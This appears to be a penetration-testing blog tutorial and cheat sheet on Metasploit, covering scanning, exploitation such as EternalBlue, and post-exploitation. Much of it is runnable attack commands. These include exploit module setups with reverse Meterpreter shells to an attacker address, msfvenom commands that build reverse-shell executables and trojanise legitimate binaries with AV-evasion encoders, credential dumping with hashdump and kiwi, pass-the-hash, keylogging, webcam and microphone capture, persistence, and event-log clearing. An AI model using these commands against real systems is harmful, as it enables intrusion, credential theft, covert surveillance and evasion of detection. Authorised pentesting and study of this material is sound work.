Leave a Comment / Exploitation, Uncategorized / By

Mastering Metasploit:

If you’re serious about penetration testing, you need to know Metasploit. It’s one of the most powerful tools in the offensive security toolkit. Whether you’re scanning, exploiting, escalating privileges, or post-exploitation looting, Metasploit offers a modular, flexible, and heavily supported framework to do it all. This post is a complete breakdown of how to use Metasploit effectively in real-world pentests.

1. What is Metasploit?

Metasploit is an open-source penetration testing framework maintained by Rapid7. It provides a suite of tools, exploits, payloads, scanners, and post-exploitation modules that make exploitation and shell access fast and repeatable. In short, it’s like a Swiss Army knife for pentesters—except it’s packed with zero-days, backdoors, and remote shells.

2. Installing and Running Metasploit

Installation (Kali Linux comes pre-installed)

If you’re on a system without it:

sudo apt update && sudo apt install metasploit-framework

Launching Metasploit

msfconsole

This launches the interactive command-line interface (CLI) where most of the work happens.

Updating the Framework

msfupdate

Make sure you do this regularly—Metasploit is constantly updated with new exploits and modules.

3. Metasploit Architecture

  • Exploits – Code that targets vulnerabilities.
  • Payloads – The code that runs after exploitation (reverse shells, Meterpreter, etc.).
  • Auxiliary Modules – For scanning, fuzzing, and general post-recon tasks.
  • Encoders – Obfuscate payloads to avoid AV detection.
  • Post Modules – Used after exploitation for privilege escalation, gathering info, etc.
  • Nops – Padding, often used to align memory in shellcode.

4. Using msfconsole Efficiently

Common Commands

search <term>         # Find modules
use <module_path>     # Load a module
info                  # Show module info
show options          # Show required/optional options
set <option> <value>  # Set option value
run / exploit         # Execute the module
sessions              # List active shells
sessions -u 1         # Upgrade session shell/meterpreter

Global Options

setg LHOST 10.10.14.25
setg LPORT 4444

Global options persist across modules.

5. Scanning and Enumeration with Metasploit

Port Scanning

use auxiliary/scanner/portscan/tcp
set RHOSTS 10.10.10.0/24
set THREADS 20
run

Service Enumeration

  • HTTP use auxiliary/scanner/http/http_version
  • SMB use auxiliary/scanner/smb/smb_version
  • SSH use auxiliary/scanner/ssh/ssh_version

Integrating Nmap

db_nmap -sV -Pn 10.10.10.5

This populates Metasploit’s internal database with hosts, services, and versions.

6. Exploitation

Example: EternalBlue (MS17-010)

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 10.10.10.40
set LHOST 10.10.14.25
set PAYLOAD windows/x64/meterpreter/reverse_tcp
exploit

Other Examples

  • FTP Backdoor: use exploit/unix/ftp/vsftpd_234_backdoor
  • Tomcat Auth Bypass: use exploit/multi/http/tomcat_mgr_upload

7. Payloads and Shells

Reverse vs Bind

  • Reverse Shell – Target connects back to attacker (bypasses NAT/firewall).
  • Bind Shell – Attacker connects to a listener on the target.

Common Payloads

  • windows/meterpreter/reverse_tcp
  • linux/x86/meterpreter_reverse_tcp
  • cmd/unix/reverse

Meterpreter Basics

sysinfo
shell
upload <file>
download <file>
keyscan_start
screenshot

8. Creating Payloads with msfvenom

Syntax

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.25 LPORT=4444 -f exe > shell.exe

Encoders (basic evasion)

-e x86/shikata_ga_nai -i 5

Inject into existing binaries

msfvenom -x legit.exe -p windows/meterpreter/reverse_tcp LHOST=... -f exe -o evil.exe

9. Meterpreter Deep Dive

Useful Commands

  • getuid, getsystem
  • hashdump
  • load kiwi (mimikatz-style cred dumping)
  • migrate <PID>
  • background (to manage multiple sessions)

Routing / Pivoting

run autoroute -s 192.168.100.0/24

10. Web App Exploits

Examples

  • WordPress: use exploit/unix/webapp/wp_admin_shell_upload
  • Shellshock: use exploit/multi/http/apache_mod_cgi_bash_env_exec

Brute Force

use auxiliary/scanner/http/http_login

11. Credential Attacks

Harvesting Modules

  • auxiliary/server/capture/smb
  • auxiliary/server/capture/http
  • auxiliary/server/capture/ftp

Using Hashes with PsExec

use exploit/windows/smb/psexec
set SMBUser admin
set SMBPass <NTLM HASH>

12. Post-Exploitation Modules

Information Gathering

  • post/windows/gather/enum_logged_on_users
  • post/multi/gather/browser_history

Persistence

  • windows/manage/persistence

Cleanup

clearev

13. Exploitation Workflow Example

  1. Scan with Nmap
  2. Import results: db_nmap
  3. Enumerate services: SMB, HTTP, SSH
  4. Exploit: EternalBlue, web upload, etc.
  5. Gain Meterpreter shell
  6. Escalate: getsystem, kiwi
  7. Loot creds, files, hashes
  8. Persist or pivot
  9. Clean up

14. Pro Tips & Metasploit Tricks

Resource Scripts

msfconsole -r myscript.rc

Background Sessions

background
sessions -i 1

Logging

spool output.txt

Database Usage

hosts
services
vulns

15. Metasploit OPSEC & Ethics

  • Don’t rely on it blindly—manual exploitation is a must-learn skill.
  • Understand your targets—Metasploit can crash systems.
  • Only use it in environments you’re authorized to test.

Meterpreter Command Cheat Sheet

CommandDescription
sysinfoDisplays system information (OS, architecture, etc.)
getuidShows the username that Meterpreter is running as
getpidDisplays the current process ID
psLists running processes
migrate <PID>Migrates Meterpreter to another process (useful for stability/stealth)
shellOpens a standard CMD shell on the victim
run post/windows/gather/hashdumpDumps local SAM hashes (if privileged)
hashdumpDumps local password hashes
load kiwiLoads Kiwi (Mimikatz module) for advanced credential access
creds_all (after load kiwi)Dumps all stored credentials found by Kiwi
execute -f <program>Executes a program on the target
upload <local> <remote>Uploads a file from your system to the victim
download <remote>Downloads a file from the victim to your system
edit <file>Opens a remote file in a local editor
cat <file>Reads and prints the contents of a file
cd <dir> / lsChange directory / List files
search -f <file>Searches for a file by name
idletimeShows how long the user has been idle
keyscan_start / keyscan_dump / keyscan_stopStart/collect/stop keylogging
screenshotTakes a screenshot of the target’s desktop
record_micStarts microphone recording (Windows target)
webcam_snapCaptures a webcam snapshot
clearevClears the Windows Event Logs (be careful – this is noisy)
portfwd add -l <LPORT> -p <TPORT> -r <RHOST>Sets up port forwarding from victim to internal host
run autoroute -s <subnet>Enables routing through victim to a new network segment

Final Thoughts:

Metasploit isn’t magic—it’s a powerful tool for automation and efficiency, but the real skill is in knowing how and when to use it. This post is your cheat sheet, guide, and field manual. The more you use it in real labs, the more it becomes second nature.

If you’re still getting comfortable, keep exploring, practicing, and pairing Metasploit with manual techniques. The best pentesters know that tools change, but principles don’t.

Related Posts

Leave a Comment

Your email address will not be published. Required fields are marked *

Scroll to Top